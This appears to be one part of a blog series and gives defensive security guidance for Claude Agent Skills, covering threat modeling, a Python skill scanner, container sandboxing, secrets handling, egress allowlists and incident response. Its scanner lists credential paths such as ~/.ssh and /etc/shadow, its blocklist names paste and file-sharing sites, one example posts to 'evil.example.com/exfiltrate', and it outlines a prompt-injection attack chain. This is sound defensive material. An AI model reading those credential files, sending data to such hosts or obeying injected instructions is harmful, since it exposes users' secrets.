In Part 5, we covered enterprise deployment and management of Claude Agent Skills. Now we address the critical topic of security. Agent Skills provide powerful capabilities, but with that power comes responsibility. This comprehensive guide covers threat modeling, skill auditing, sandboxing techniques, credential management, and defense-in-depth strategies to protect your organization from security risks while maintaining the productivity benefits of Skills.
Understanding the Security Landscape
In 2025, the security landscape for AI agents has matured significantly. As industry analysts note, the focus has shifted from “Is Claude safe?” to “How do we design permissions, isolate execution, govern data, and monitor agentic behavior?” Successful deployments treat Skills like software components with least privilege by default, explicit action gates, audited supply chains, and continuous monitoring.
Key Security Challenges
Agent Skills introduce several security considerations that differ from traditional application security:
- Skills execute code with the same permissions as the user or container
- Malicious skills can direct Claude to exfiltrate data or take unintended actions
- Supply chain exposure through third-party or shared skills with risky dependencies
- Shadow AI and data sprawl from unmanaged skills and OAuth scopes
- Prompt injection attacks that manipulate skill behavior
- Business logic vulnerabilities that automated review alone cannot catch
- Data residency and compliance requirements (GDPR, HIPAA, SOC 2)
According to Anthropic’s 2025 threat intelligence reports, organized misuse campaigns have adopted tooling that resembles legitimate agent workflows, making detection increasingly complex. This requires robust controls and response playbooks.
Threat Modeling for Agent Skills
Effective security begins with understanding potential threats. Use this structured approach to threat modeling:
STRIDE Threat Model for Skills
Spoofing Identity:
- Threat: Malicious skill impersonates trusted organizational skill
- Mitigation: Digital signatures, trusted repositories, version control
- Risk Level: Medium
Tampering with Data:
- Threat: Skill modifies sensitive data without authorization
- Mitigation: Read-only mode, explicit approval workflows, audit logging
- Risk Level: High
Repudiation:
- Threat: Actions taken by skill cannot be traced to specific user
- Mitigation: Comprehensive audit trails, user attribution, timestamping
- Risk Level: Medium
Information Disclosure:
- Threat: Skill exfiltrates confidential data to external endpoints
- Mitigation: Network isolation, egress filtering, data classification
- Risk Level: Critical
Denial of Service:
- Threat: Malicious skill consumes excessive resources
- Mitigation: Resource limits, timeout controls, rate limiting
- Risk Level: Low
Elevation of Privilege:
- Threat: Skill gains access beyond intended scope
- Mitigation: Principle of least privilege, capability-based security
- Risk Level: High
Attack Vectors and Scenarios
Scenario 1: Malicious Skill Installation
Attack Chain:
1. Attacker creates skill with seemingly legitimate functionality
2. Skill includes hidden code that exfiltrates sensitive files
3. Developer installs skill from untrusted source
4. Skill activates on normal usage, exfiltrating data
Prevention:
- Install skills only from trusted sources (Anthropic, verified partners)
- Require security review before installation
- Implement network egress controls
- Monitor for unusual file access patterns
Scenario 2: Supply Chain Compromise
Attack Chain:
1. Legitimate skill depends on external library
2. Library maintainer account is compromised
3. Malicious code injected into library update
4. Organizations automatically pull compromised version
Prevention:
- Pin dependency versions explicitly
- Review dependency changes before updates
- Use private package mirrors with security scanning
- Implement software bill of materials (SBOM) tracking
Scenario 3: Prompt Injection via Skill
Attack Chain:
1. Skill processes external data (user uploads, API responses)
2. Attacker embeds malicious instructions in data
3. Skill passes tainted data to Claude
4. Claude executes unintended actions
Prevention:
- Sanitize all external inputs
- Use structured data formats (JSON) over free text
- Implement input validation in skill scripts
- Separate instruction context from data context
Skill Auditing and Review Process
Thorough auditing is your first line of defense. Every skill should undergo security review before deployment.
Pre-Deployment Security Checklist
1. Source and Provenance Review
- Verify skill source (Anthropic official, verified partner, internal development)
- Check digital signatures if available
- Review commit history if from version control
- Identify all contributors and maintainers
- Assess trustworthiness of external dependencies
2. Code and Content Analysis
- Read SKILL.md for stated functionality and scope
- Review all bundled scripts for malicious patterns
- Check for hardcoded credentials or secrets
- Identify network calls to external endpoints
- Analyze file system access patterns
- Review environment variable usage
3. Dependency Analysis
- List all external dependencies (Python packages, npm modules)
- Check for known vulnerabilities (CVE databases)
- Verify dependency licenses for compliance
- Review dependency update frequency and maintenance
- Assess supply chain risk for each dependency
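Parts of the dependency checklist above can be automated during review. As one possible sketch (a hypothetical helper, not a full requirements parser), the following flags `requirements.txt` lines that lack an exact `==` pin:

```python
import re

def find_unpinned(requirements_text: str) -> list:
    """Return requirement lines that are not pinned to an exact version."""
    flagged = []
    for raw in requirements_text.splitlines():
        line = raw.split('#', 1)[0].strip()  # ignore comments and blank lines
        if not line:
            continue
        # an exact pin looks like 'package==1.2.3'; anything else is flagged
        if not re.search(r'==\d[\w.]*$', line):
            flagged.append(line)
    return flagged
```

Version ranges (`>=`), bare package names, and wildcard pins (`==2.*`) are all reported, so a reviewer sees every dependency that could silently change between installs.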
Automated Security Scanning
Implement automated scanning to catch common vulnerabilities:
Python: Skill Security Scanner
import os
import re
import yaml
import subprocess
from pathlib import Path
from typing import List, Dict, Set
class SkillSecurityScanner:
"""Automated security scanner for Claude Agent Skills"""
DANGEROUS_PATTERNS = [
r'eval\s*\(', # Arbitrary code execution
r'exec\s*\(', # Arbitrary code execution
r'__import__\s*\(', # Dynamic imports
r'os\.system\s*\(', # Shell command execution
r'subprocess\.(call|run|Popen)', # Shell command execution
r'requests\.(get|post)', # Network requests
r'urllib\.request', # Network requests
r'socket\.', # Network sockets
r'pickle\.loads', # Unsafe deserialization
r'yaml\.load\(', # Unsafe YAML loading
r'base64\.b64decode', # Potential obfuscation
]
SENSITIVE_PATHS = [
r'~/.ssh',
r'~/.aws',
r'/etc/passwd',
r'/etc/shadow',
r'\.env',
r'\.git/config',
]
def __init__(self, skill_path: str):
self.skill_path = Path(skill_path)
self.findings: List[Dict] = []
def scan(self) -> Dict:
"""Run comprehensive security scan"""
print(f"Scanning skill: {self.skill_path.name}")
# Check skill structure
self._check_structure()
# Validate YAML frontmatter
self._validate_frontmatter()
# Scan for dangerous patterns
self._scan_code_patterns()
# Check dependencies
self._check_dependencies()
# Analyze file permissions
self._check_permissions()
# Generate report
return self._generate_report()
def _check_structure(self):
"""Verify skill has proper structure"""
skill_md = self.skill_path / 'SKILL.md'
if not skill_md.exists():
self._add_finding(
severity='CRITICAL',
category='Structure',
message='Missing SKILL.md file',
file='N/A'
)
return
# Check for unexpected executable files
for file in self.skill_path.rglob('*'):
if file.is_file() and os.access(file, os.X_OK):
if file.suffix not in ['.py', '.sh', '.js']:
self._add_finding(
severity='HIGH',
category='Structure',
message=f'Unexpected executable file: {file.name}',
file=str(file.relative_to(self.skill_path))
)
def _validate_frontmatter(self):
"""Parse and validate YAML frontmatter"""
skill_md = self.skill_path / 'SKILL.md'
if not skill_md.exists(): return  # missing file already reported by _check_structure
with open(skill_md, 'r') as f:
content = f.read()
# Extract YAML frontmatter
match = re.match(r'^---\n(.*?)\n---', content, re.DOTALL)
if not match:
self._add_finding(
severity='CRITICAL',
category='Frontmatter',
message='Missing or invalid YAML frontmatter',
file='SKILL.md'
)
return
try:
frontmatter = yaml.safe_load(match.group(1))
# Validate required fields
if 'name' not in frontmatter:
self._add_finding(
severity='HIGH',
category='Frontmatter',
message='Missing required field: name',
file='SKILL.md'
)
if 'description' not in frontmatter:
self._add_finding(
severity='HIGH',
category='Frontmatter',
message='Missing required field: description',
file='SKILL.md'
)
# Check for suspicious metadata
if 'allowed-tools' in frontmatter:
tools = frontmatter['allowed-tools']
if 'bash' in str(tools).lower():  # handles both list and string values
self._add_finding(
severity='MEDIUM',
category='Permissions',
message='Skill requests bash execution privileges',
file='SKILL.md'
)
except yaml.YAMLError as e:
self._add_finding(
severity='HIGH',
category='Frontmatter',
message=f'Invalid YAML syntax: {e}',
file='SKILL.md'
)
def _scan_code_patterns(self):
"""Scan all code files for dangerous patterns"""
code_extensions = ['.py', '.js', '.sh', '.bash']
for file in self.skill_path.rglob('*'):
if file.suffix in code_extensions:
self._scan_file(file)
def _scan_file(self, file: Path):
"""Scan individual file for security issues"""
try:
with open(file, 'r', encoding='utf-8') as f:
content = f.read()
lines = content.split('\n')
# Check for dangerous patterns
for pattern in self.DANGEROUS_PATTERNS:
for line_num, line in enumerate(lines, 1):
if re.search(pattern, line):
self._add_finding(
severity='HIGH',
category='Code Pattern',
message=f'Dangerous pattern detected: {pattern}',
file=str(file.relative_to(self.skill_path)),
line=line_num,
snippet=line.strip()
)
# Check for sensitive path access
for pattern in self.SENSITIVE_PATHS:
if re.search(pattern, content):
self._add_finding(
severity='HIGH',
category='File Access',
message=f'Access to sensitive path: {pattern}',
file=str(file.relative_to(self.skill_path))
)
# Check for hardcoded secrets
secret_patterns = [
r'password\s*=\s*["\'](.+)["\']',
r'api[_-]?key\s*=\s*["\'](.+)["\']',
r'secret\s*=\s*["\'](.+)["\']',
r'token\s*=\s*["\'](.+)["\']',
]
for pattern in secret_patterns:
matches = re.finditer(pattern, content, re.IGNORECASE)
for match in matches:
self._add_finding(
severity='CRITICAL',
category='Secrets',
message='Hardcoded credential detected',
file=str(file.relative_to(self.skill_path)),
snippet=match.group(0)
)
except UnicodeDecodeError:
self._add_finding(
severity='LOW',
category='File Format',
message='Binary file or unsupported encoding',
file=str(file.relative_to(self.skill_path))
)
def _check_dependencies(self):
"""Check for dependency vulnerabilities"""
# Check Python requirements
requirements_file = self.skill_path / 'requirements.txt'
if requirements_file.exists():
try:
result = subprocess.run(
['pip-audit', '-r', str(requirements_file)],
capture_output=True,
text=True,
timeout=30
)
if result.returncode != 0:
self._add_finding(
severity='HIGH',
category='Dependencies',
message='Vulnerable dependencies detected',
file='requirements.txt',
snippet=result.stdout
)
except (subprocess.TimeoutExpired, FileNotFoundError):
self._add_finding(
severity='LOW',
category='Dependencies',
message='Could not run pip-audit (ensure pip-audit is installed)',
file='requirements.txt'
)
# Check Node.js dependencies
package_json = self.skill_path / 'package.json'
if package_json.exists():
try:
result = subprocess.run(
['npm', 'audit', '--json'],
cwd=self.skill_path,
capture_output=True,
text=True,
timeout=30
)
if result.returncode != 0:
self._add_finding(
severity='HIGH',
category='Dependencies',
message='npm audit found vulnerabilities',
file='package.json'
)
except (subprocess.TimeoutExpired, FileNotFoundError):
pass
def _check_permissions(self):
"""Check file permissions for security issues"""
for file in self.skill_path.rglob('*'):
if file.is_file():
mode = file.stat().st_mode
# Check if world-writable
if mode & 0o002:
self._add_finding(
severity='MEDIUM',
category='Permissions',
message='World-writable file detected',
file=str(file.relative_to(self.skill_path))
)
def _add_finding(self, severity: str, category: str, message: str,
file: str, line: int = None, snippet: str = None):
"""Add security finding"""
finding = {
'severity': severity,
'category': category,
'message': message,
'file': file
}
if line:
finding['line'] = line
if snippet:
finding['snippet'] = snippet
self.findings.append(finding)
def _generate_report(self) -> Dict:
"""Generate security scan report"""
severity_counts = {
'CRITICAL': 0,
'HIGH': 0,
'MEDIUM': 0,
'LOW': 0
}
for finding in self.findings:
severity_counts[finding['severity']] += 1
from datetime import datetime  # local import so the timestamp is self-contained
report = {
'skill_name': self.skill_path.name,
'scan_date': datetime.now().isoformat(),
'total_findings': len(self.findings),
'severity_counts': severity_counts,
'findings': sorted(self.findings,
key=lambda x: ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW'].index(x['severity'])),
'risk_score': self._calculate_risk_score(severity_counts)
}
return report
def _calculate_risk_score(self, severity_counts: Dict) -> int:
"""Calculate overall risk score (0-100)"""
weights = {'CRITICAL': 25, 'HIGH': 10, 'MEDIUM': 3, 'LOW': 1}
score = sum(severity_counts[sev] * weight
for sev, weight in weights.items())
return min(score, 100)
# Example usage
if __name__ == '__main__':
scanner = SkillSecurityScanner('./skills/custom-skill')
report = scanner.scan()
print(f"\nSecurity Scan Report")
print(f"===================")
print(f"Skill: {report['skill_name']}")
print(f"Total Findings: {report['total_findings']}")
print(f"Risk Score: {report['risk_score']}/100")
print(f"\nSeverity Breakdown:")
for severity, count in report['severity_counts'].items():
print(f" {severity}: {count}")
if report['total_findings'] > 0:
print(f"\nFindings:")
for finding in report['findings']:
print(f"\n [{finding['severity']}] {finding['category']}")
print(f" File: {finding['file']}")
print(f" Message: {finding['message']}")
if 'line' in finding:
print(f" Line: {finding['line']}")
if 'snippet' in finding:
print(f" Snippet: {finding['snippet'][:100]}...")
Sandboxing and Isolation Strategies
Proper isolation limits the blast radius if a skill is compromised. Implement defense-in-depth through multiple isolation layers.
Container-Based Isolation
Run skills in isolated containers with restricted permissions:
Docker Container Configuration
# Dockerfile for skill execution
FROM python:3.11-slim
# Create non-root user
RUN useradd -m -u 1000 skillrunner
# Install minimal dependencies
RUN apt-get update && apt-get install -y \
--no-install-recommends \
ca-certificates \
&& rm -rf /var/lib/apt/lists/*
# Set working directory
WORKDIR /workspace
# Copy skill files
COPY --chown=skillrunner:skillrunner skills/ /skills/
# Switch to non-root user
USER skillrunner
# Disable network by default (override if needed)
# Run with: docker run --network=none
# Set resource limits
# Run with: docker run --memory="512m" --cpus="1.0"
CMD ["python", "-m", "skill_runner"]
Docker Compose with Security Hardening
version: '3.8'
services:
skill-executor:
build: .
container_name: claude-skill-sandbox
# Security options
security_opt:
- no-new-privileges:true
# keep Docker's default seccomp profile; seccomp:unconfined would disable syscall filtering
# Read-only root filesystem
read_only: true
# Temporary filesystem for workspace
tmpfs:
- /tmp:noexec,nosuid,size=100m
- /workspace:exec,nosuid,size=500m
# Resource limits
mem_limit: 512m
cpus: 1.0
# Network isolation (no network by default)
network_mode: none
# Capabilities (drop all, add only needed)
cap_drop:
- ALL
# User
user: "1000:1000"
# Volume mounts (read-only where possible)
volumes:
- ./skills:/skills:ro
- ./output:/output:rw
# Environment variables
environment:
- PYTHONUNBUFFERED=1
- SKILL_EXECUTION_TIMEOUT=300
Filesystem Restrictions
Limit skill access to specific directories:
Python: Filesystem Access Control
import os
from pathlib import Path
from typing import Set
class RestrictedFilesystem:
"""Enforce filesystem access restrictions for skills"""
def __init__(self, allowed_paths: Set[str]):
self.allowed_paths = {Path(p).resolve() for p in allowed_paths}
def is_allowed(self, path: str) -> bool:
"""Check if path access is allowed"""
target = Path(path).resolve()
# Check if path is within any allowed directory
for allowed in self.allowed_paths:
try:
target.relative_to(allowed)
return True
except ValueError:
continue
return False
def validate_access(self, path: str, operation: str = 'read'):
"""Validate and enforce access control"""
if not self.is_allowed(path):
raise PermissionError(
f"Access denied: {operation} operation on {path} not allowed"
)
# Example usage
fs = RestrictedFilesystem({
'/workspace',
'/tmp/skill-output'
})
# Intercept file operations
def safe_open(path, mode='r', **kwargs):
"""Wrapper for open() with access control"""
operation = 'write' if 'w' in mode or 'a' in mode else 'read'
fs.validate_access(path, operation)
return open(path, mode, **kwargs)
# Use in skill execution
try:
with safe_open('/workspace/data.txt', 'r') as f:
content = f.read()
except PermissionError as e:
print(f"Security violation: {e}")
Credential and Secrets Management
Never hardcode credentials in skills. Use proper secrets management:
Environment Variable Best Practices
# WRONG: Hardcoded credentials
API_KEY = "sk-1234567890abcdef"
DATABASE_URL = "postgresql://user:password@host/db"
# CORRECT: Environment variables
import os
API_KEY = os.environ.get('API_KEY')
DATABASE_URL = os.environ.get('DATABASE_URL')
if not API_KEY:
raise ValueError("API_KEY environment variable not set")
Integration with Secrets Managers
Node.js: AWS Secrets Manager Integration
const { SecretsManagerClient, GetSecretValueCommand } = require('@aws-sdk/client-secrets-manager');
class SecureCredentials {
constructor(region = 'us-east-1') {
this.client = new SecretsManagerClient({ region });
this.cache = new Map();
this.cacheTTL = 300000; // 5 minutes
}
async getSecret(secretName) {
// Check cache first
const cached = this.cache.get(secretName);
if (cached && Date.now() - cached.timestamp < this.cacheTTL) {
return cached.value;
}
try {
const command = new GetSecretValueCommand({
SecretId: secretName
});
const response = await this.client.send(command);
const secret = response.SecretString;
// Cache the result
this.cache.set(secretName, {
value: secret,
timestamp: Date.now()
});
return secret;
} catch (error) {
console.error(`Failed to retrieve secret ${secretName}:`, error);
throw error;
}
}
async getCredentials(credentialPath) {
const secret = await this.getSecret(credentialPath);
return JSON.parse(secret);
}
}
// Usage in skill
const credentials = new SecureCredentials();
async function initializeSkill() {
const apiKey = await credentials.getSecret('claude-skills/api-key');
const dbCreds = await credentials.getCredentials('claude-skills/database');
// Use credentials securely
// Never log or expose them
}
module.exports = { SecureCredentials };
Network Security and Egress Control
Control network access to prevent data exfiltration:
Egress Filtering Strategy
Allowed Destinations:
- Anthropic API endpoints (api.anthropic.com)
- Package repositories (pypi.org, npmjs.org)
- Internal corporate APIs (*.company.com)
- Approved partner APIs (explicitly allowlisted)
Blocked Destinations:
- Personal cloud storage (dropbox.com, drive.google.com)
- Paste sites (pastebin.com, gist.github.com)
- File sharing services (transfer.sh, file.io)
- Suspicious or newly registered domains
- All other internet destinations (deny by default)
Implementation: Network Proxy
Python: HTTP Proxy with Allowlist
import requests
from datetime import datetime
from urllib.parse import urlparse
from typing import Set
class SecureHTTPSession:
"""HTTP session with allowlist enforcement"""
ALLOWED_DOMAINS = {
'api.anthropic.com',
'pypi.org',
'files.pythonhosted.org',
'company.internal.com',
}
def __init__(self):
self.session = requests.Session()
self.audit_log = []
def _is_allowed(self, url: str) -> bool:
"""Check if URL is allowed"""
parsed = urlparse(url)
domain = parsed.netloc.lower()
# Check exact match
if domain in self.ALLOWED_DOMAINS:
return True
# Check wildcard match
for allowed in self.ALLOWED_DOMAINS:
if allowed.startswith('*.') and domain.endswith(allowed[1:]):
return True
return False
def request(self, method: str, url: str, **kwargs):
"""Make HTTP request with security checks"""
if not self._is_allowed(url):
self._log_blocked(method, url)
raise PermissionError(
f"Network access denied: {url} not in allowlist"
)
self._log_allowed(method, url)
return self.session.request(method, url, **kwargs)
def get(self, url: str, **kwargs):
return self.request('GET', url, **kwargs)
def post(self, url: str, **kwargs):
return self.request('POST', url, **kwargs)
def _log_allowed(self, method: str, url: str):
self.audit_log.append({
'action': 'allowed',
'method': method,
'url': url,
'timestamp': str(datetime.now())
})
def _log_blocked(self, method: str, url: str):
self.audit_log.append({
'action': 'blocked',
'method': method,
'url': url,
'timestamp': str(datetime.now())
})
# Alert on blocked attempts
print(f"SECURITY ALERT: Blocked network access to {url}")
# Usage
http = SecureHTTPSession()
try:
response = http.get('https://api.anthropic.com/v1/messages')
# Succeeds
except PermissionError:
# Never reached for allowed domains
pass
try:
response = http.post('https://evil.example.com/exfiltrate')
# Raises PermissionError
except PermissionError as e:
print(f"Security violation: {e}")
Monitoring and Incident Response
Continuous monitoring enables rapid detection and response to security incidents:
Security Monitoring Checklist
- Log all skill executions with user attribution
- Monitor for unusual file access patterns
- Track network egress attempts
- Alert on failed permission checks
- Monitor resource consumption anomalies
- Track skill version changes
- Log all skill installations and removals
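The first checklist item can be as simple as emitting one structured line per event. A minimal sketch (field names are illustrative, not a required schema):

```python
import json
from datetime import datetime, timezone

def audit_event(user: str, skill: str, action: str, detail: str = '') -> str:
    """Serialize one skill-related event as an append-only JSON log line."""
    entry = {
        'timestamp': datetime.now(timezone.utc).isoformat(),
        'user': user,        # attribution: who triggered the skill
        'skill': skill,      # which skill was involved
        'action': action,    # e.g. 'execute', 'install', 'egress_blocked'
        'detail': detail,
    }
    return json.dumps(entry, sort_keys=True)
```

Because each line is self-describing JSON with user attribution and a UTC timestamp, the same stream supports both real-time alerting and the forensic timeline reconstruction needed during incident response.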
Incident Response Playbook
Phase 1: Detection (0-5 minutes)
- Security monitoring alerts on suspicious activity
- Automated systems flag anomalous behavior
- User reports unusual skill behavior
Phase 2: Containment (5-15 minutes)
- Immediately disable affected skill organization-wide
- Isolate affected containers/environments
- Block network egress if data exfiltration suspected
- Preserve logs and evidence
Phase 3: Investigation (15-60 minutes)
- Analyze audit logs for scope of impact
- Identify affected users and data
- Review skill code and dependencies
- Determine root cause
Phase 4: Eradication (1-4 hours)
- Remove malicious skill from all systems
- Patch vulnerabilities that enabled incident
- Reset compromised credentials
- Update allowlists and security policies
Phase 5: Recovery (4-24 hours)
- Deploy patched or replacement skill if needed
- Restore normal operations
- Notify affected stakeholders
- Document lessons learned
Phase 6: Post-Incident (24-72 hours)
- Complete incident report
- Update security procedures
- Enhance monitoring based on findings
- Conduct team retrospective
Compliance and Regulatory Considerations
GDPR Compliance
- Document data processing activities for skills
- Implement data minimization principles
- Ensure right to erasure (delete skill data)
- Maintain data processing records
- Conduct Data Protection Impact Assessments (DPIA)
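One lightweight way to maintain data processing records is to keep them as structured data alongside each skill. A hedged sketch (the field names and the example skill are hypothetical, loosely modeled on GDPR Article 30 records):

```python
from dataclasses import dataclass, asdict

@dataclass(frozen=True)
class ProcessingRecord:
    """One record of a skill's data processing activity."""
    skill_name: str
    purpose: str
    data_categories: tuple   # e.g. ('invoice PDFs', 'vendor names')
    retention_days: int      # supports erasure and minimization reviews
    recipients: tuple = ()   # downstream systems receiving the data

record = ProcessingRecord(
    skill_name='invoice-extractor',  # hypothetical skill
    purpose='Extract line items from uploaded invoices',
    data_categories=('invoice PDFs', 'vendor names'),
    retention_days=30,
)
```

Keeping the record machine-readable means retention and erasure obligations can be checked automatically rather than tracked in a spreadsheet.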
HIPAA Compliance
- Execute a Business Associate Agreement (BAA) with your AI vendor before any PHI processing
- Limit skill access to PHI under the minimum-necessary standard
- Encrypt PHI at rest and in transit
- Implement audit controls covering every skill interaction with PHI
- Include skills in breach notification and contingency planning
SOC 2 Compliance
- Document skill approval and review processes
- Implement change management for skill updates
- Maintain access control matrices
- Regular security assessments and penetration testing
- Vendor risk management for third-party skills
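Change management for skill updates needs a way to tell whether a deployed skill still matches its approved version. One possible approach (a sketch, not an official mechanism) is a content fingerprint over the skill directory:

```python
import hashlib
from pathlib import Path

def skill_fingerprint(skill_dir: str) -> str:
    """SHA-256 over every file's relative path and contents, in sorted order.

    Comparing the result against the fingerprint recorded at approval time
    detects any unreviewed change to the skill's files.
    """
    digest = hashlib.sha256()
    base = Path(skill_dir)
    for path in sorted(p for p in base.rglob('*') if p.is_file()):
        digest.update(str(path.relative_to(base)).encode())
        digest.update(path.read_bytes())
    return digest.hexdigest()
```

Record the fingerprint when a skill passes review, then recompute it on a schedule or at load time; any mismatch is a change-management violation worth investigating.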
Security Best Practices Summary
- Install skills only from trusted sources (Anthropic, verified partners, internal)
- Conduct thorough security review before any skill deployment
- Run skills in isolated containers with minimal permissions
- Use secrets managers for all credentials, never hardcode
- Implement egress filtering with explicit allowlists
- Enable comprehensive audit logging for all skill operations
- Regularly update dependencies and scan for vulnerabilities
- Maintain incident response procedures specific to AI agents
- Separate consumer and enterprise Claude usage strictly
- Conduct regular security training for skill developers
Coming Up Next
You now have comprehensive knowledge of security best practices for Claude Agent Skills, from threat modeling through incident response. In Part 7, we will explore building skills for specific use cases, providing real-world examples including financial reporting, code review automation, customer support workflows, and data analysis pipelines with complete implementation code.
References
- Skywork AI - "Are Claude Skills Secure? Threat Model, Permissions & Best Practices (2025)" (https://skywork.ai/blog/ai-agent/claude-skills-security-threat-model-permissions-best-practices-2025/)
- Reco - "Claude Security Explained: Benefits, Challenges & Compliance" (https://www.reco.ai/learn/claude-security)
- Anthropic Engineering Blog - "Equipping agents for the real world with Agent Skills" (https://www.anthropic.com/engineering/equipping-agents-for-the-real-world-with-agent-skills)
- MintMCP - "Claude Code Security: Enterprise Best Practices & Risk Mitigation" (https://www.mintmcp.com/blog/claude-code-security)
- Backslash Security - "Claude Code Security Best Practices" (https://www.backslash.security/blog/claude-code-security-best-practices)
- Eesel - "A deep dive into security for Claude Code in 2025" (https://www.eesel.ai/blog/security-claude-code)
- Claude Developer Platform - "Agent Skills Overview" (https://platform.claude.com/docs/en/agents-and-tools/agent-skills/overview)
